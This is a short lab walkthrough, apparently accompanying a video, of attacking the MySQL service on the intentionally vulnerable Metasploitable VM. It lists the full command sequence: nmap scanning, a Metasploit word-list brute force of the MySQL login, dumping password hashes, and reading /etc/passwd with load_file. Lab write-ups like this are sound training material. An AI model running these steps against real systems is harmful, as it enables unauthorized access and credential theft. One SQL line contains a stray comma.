Metasploitable - MySQL

This video demonstrates an attack on the MySQL database service on the metasploitable hackable box.

"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Metasploitable-MySQL.mp4

Download ([debian_ssh_rsa_2048_x86.tar.bz2][99]): *[Coming soon][99]*

Download (usernames.lst): Coming soon

Download (passwords.lst): Coming soon

Method

  • Use Nmap to scan the network (gathering information)
  • Use Nmap to do a more detailed scan of the target (gathering information)
  • Use Metasploit to brute force the login (gaining access)
  • By using MySQL client we are able to send commands to the database (Discover password hashes and reading files)

Tools

  • Nmap - on Backtrack 4 (Final)
  • Metasploit - on Backtrack 4 (Final)
  • MySQL - on Backtrack 4 (Final)
  • Dictionaries/Word-lists - *Coming soon*
  • Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
nmap 192.168.1.1-255
nmap -sS -sV -O -f -n 192.168.1.105
msfconsole
search mysql
use scanner/mysql/mysql_login
show options
set RHOSTS 192.168.1.105
set USER_FILE /root/usernames.lst
set PASS_FILE /root/passwords.lst
exploit
mysql -h 192.168.1.105 -u root -p
root
show databases;
use mysql
show tables;
select User, Password, from user;
select load_file('/etc/passwd');

Notes

Song: Roberto Sol and Chris le Blanc; Ines - Sueno Damor

Video length: 3:24

Capture length: 9:14

Blog Post: https://blog.g0tmi1k.com/2010/07/metasploitable-mysql/